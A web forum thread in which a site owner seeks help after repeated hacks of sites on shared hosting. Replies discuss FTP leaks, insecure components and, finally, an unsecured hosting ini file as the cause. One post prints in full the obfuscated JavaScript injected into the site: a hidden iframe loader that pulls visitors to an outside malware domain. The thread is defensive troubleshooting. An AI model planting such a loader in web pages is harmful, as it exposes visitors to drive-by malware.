Site's keep getting hacked

[Deleted User 234324]

Got into work this morning only to find one of our sites has been hacked and malicious code added to the index.php header.

The code itself was javascript jibberish, but because of that google has now flagged the site as malicious. I can't for the life of me see how they are doing it ?

 

[daz]

This type of attack is most commonly caused by leaked/compromised FTP details.

 

[Pho]

Can you check your server access logs? I've seen this happen from both leaked passwords (check your FTP Log) as above or from using old versions of libraries which are exploitable, i.e. a dodgy file upload component which allows PHP files to be uploaded and executed (check your webserver log).

 

[Deleted User 234324]

Looked through the ftp logs and the only ip address currently shown is mine (at work) and at home.

So they must be doing it through cpanel or something.

 

[Imy]

Maybe the PHP code itself is insecure.

If you're only using cpanel for yourself, turn it off until you need it and keep it patched.

 

[malef!c]

What kind of site is it - custom job or an off the shelf affair like Wordpress, Joomla etc?
Is it on shared hosting or your own box in a datacentre / in your office etc?

 

[Deleted User 234324]

Custom site on shared hosting, provided by a 3rd party company who deal mostly with charitable organisations.

We've managed to resolve it now though, changed all passwords etc so hopefully wont happen again.

There's no specific code on our site that would enable them to inject or upload files without using FTP.

 

[malef!c]

If its a shared host then if one site on the box gets hacked then the attacker may have the ability to update all pages across all domains. Just because your site is secure, it doesn't mean everyone elses is

Glad you cleaned it up.

 

[daz]

If its a shared host then if one site on the box gets hacked then the attacker may have the ability to update all pages across all domains.

This is unlikely to be the case with most hosting providers in this day and age.

 

[malef!c]

Not all are as good as you think though - I have been on some ropey ones in the last 18 months or so before finding TSO / Vida

 

[kwerk]

Are you running oscommerce or joomla?

The javascript is probably obfuscated but still functional.

 

[Deleted User 234324]

It was obfuscated java that got added to some of the files, also noticed that one of our sites used for testing someone had uploaded several folders of files, one of which was a known hacking tool used for distributed computing hack thingies.

 

[Deleted User 234324]

<script language=JavaScript>

var zpkqvadrdax = 'YzysAWyJaJ3cYzysAWyJaJ69YzysAWyJaJ66';var tqswscplhbk = 'YzysAWyJaJ72';var qjmlioubyfr = 'YzysAWyJaJ61YzysAWyJaJ6dYzysAWyJaJ65YzysAWyJaJ20YzysAWyJaJ6eYzysAWyJaJ61YzysAWyJaJ6dYzysAWyJaJ65YzysAWyJaJ3dYzysAWyJaJ22';var wwmjadmaalr = 'YzysAWyJaJ70YzysAWyJaJ78YzysAWyJaJ62YzysAWyJaJ6dYzysAWyJaJ6dYzysAWyJaJ66YzysAWyJaJ7aYzysAWyJaJ68YzysAWyJaJ78YzysAWyJaJ62YzysAWyJaJ6b';var vhjvxvdyfri = 'YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ77YzysAWyJaJ69YzysAWyJaJ64YzysAWyJaJ74YzysAWyJaJ68YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ31YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ68YzysAWyJaJ65YzysAWyJaJ69YzysAWyJaJ67YzysAWyJaJ68YzysAWyJaJ74YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ30YzysAWyJaJ22';var xdqgxsedjna = 'YzysAWyJaJ20YzysAWyJaJ73YzysAWyJaJ72YzysAWyJaJ63YzysAWyJaJ3dYzysAWyJaJ22';var nwazibauttc = 'YzysAWyJaJ68YzysAWyJaJ74YzysAWyJaJ74YzysAWyJaJ70YzysAWyJaJ3aYzysAWyJaJ2fYzysAWyJaJ2f';var ypzysyejgvn = 'www.moscowismine.in/eclipsework/index.php';var ubkpgoyuouq = 'YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ6dYzysAWyJaJ61YzysAWyJaJ72YzysAWyJaJ67YzysAWyJaJ69YzysAWyJaJ6eYzysAWyJaJ77YzysAWyJaJ69YzysAWyJaJ64YzysAWyJaJ74YzysAWyJaJ68YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ31YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ6dYzysAWyJaJ61YzysAWyJaJ72YzysAWyJaJ67YzysAWyJaJ69YzysAWyJaJ6eYzysAWyJaJ68YzysAWyJaJ65YzysAWyJaJ69YzysAWyJaJ67YzysAWyJaJ68YzysAWyJaJ74YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ30YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ74YzysAWyJaJ69YzysAWyJaJ74YzysAWyJaJ6cYzysAWyJaJ65YzysAWyJaJ3dYzysAWyJaJ22';var ytzrtuknwoc = 'YzysAWyJaJ70YzysAWyJaJ78YzysAWyJaJ62YzysAWyJaJ6dYzysAWyJaJ6dYzysAWyJaJ66YzysAWyJaJ7aYzysAWyJaJ68YzysAWyJaJ78YzysAWyJaJ62YzysAWyJaJ6b';var nmuvrdcmrzo = 'YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ73YzysAWyJaJ63YzysAWyJaJ72YzysAWyJaJ6fYzysAWyJaJ6cYzysAWyJaJ6cYzysAWyJaJ69YzysAWyJaJ6eYzysAWyJaJ67YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ6eYzysAWyJaJ6fYzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ62YzysAWyJaJ6fYzysAWyJaJ72YzysAWyJaJ64YzysAWyJaJ65YzysAWyJaJ72YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ30YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ66YzysAWyJaJ72YzysAWyJaJ61YzysAWyJaJ6dYzysAWyJaJ65YzysAWyJaJ62YzysAWyJaJ6fYzysAWyJaJ72YzysAWyJaJ64YzysAWyJaJ65YzysAWyJaJ72YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ30YzysAWyJaJ22YzysAWyJaJ3e';var povqnpfhgvb = 'YzysAWyJaJ3cYzysAWyJaJ2fYzysAWyJaJ69YzysAWyJaJ66';var omvaxiwlkty = 'YzysAWyJaJ72YzysAWyJaJ61';var sopiqcapqce = 'YzysAWyJaJ6dYzysAWyJaJ65YzysAWyJaJ3e';var ysrbyzhtanf = new Array();ysrbyzhtanf[0]=new Array(zpkqvadrdax+tqswscplhbk+qjmlioubyfr+wwmjadmaalr+vhjvxvdyfri+xdqgxsedjna+nwazibauttc+ypzysyejgvn+ubkpgoyuouq+ytzrtuknwoc+nmuvrdcmrzo+povqnpfhgvb+omvaxiwlkty+sopiqcapqce);document['YzysAWyJaJwYzysAWyJaJrYzysAWyJaJiYzysAWyJaJtYzysAWyJaJeYzysAWyJaJ'.replace(/YzysAWyJaJ/g,'')](window['YzysAWyJaJuYzysAWyJaJnYzysAWyJaJeYzysAWyJaJsYzysAWyJaJcYzysAWyJaJaYzysAWyJaJpYzysAWyJaJeYzysAWyJaJ'.replace(/YzysAWyJaJ/g,'')](ysrbyzhtanf.toString().replace(/YzysAWyJaJ/g,'%')));</script>

Thats the code used if anyone is interested.

*********** please delete this admins if its nasty ***********

 

[Imy]

Fairly typical malware code. Anyone visiting an infected webpage loads another webpage (in this case a russian malware site on an Indian domain?!) which hosts the real malware. The malware site will then use browser exploits to download other malware to the user's PC.

Great way to ruin the rep of your business also if you don't plug the hole.

Google's advisory on the domain:
http://www.google.com/safebrowsing/diagnostic?site=moscowismine.in/

 

[Deleted User 234324]

Well got into work this morning after a long weekend off only to find 2 of the domains have been hacked again.

Both domains had passwords changed from a clean machine so they must be getting in using another method. Passwords would have been impossible to guess.

 

[markeh]

It's hard to trace this stuff in my experience. Did you build the site yourself?

 

[Pho]

Check the website access logs (apache / IIS logs etc). Are you sure you don't have any dodgy third-party components?

 

[Deleted User 234324]

Problem solved, turned out the hosting company left an ini file unsecure allowing public access to sql databases etc.

They have rectified the problem and compensated us accordingly.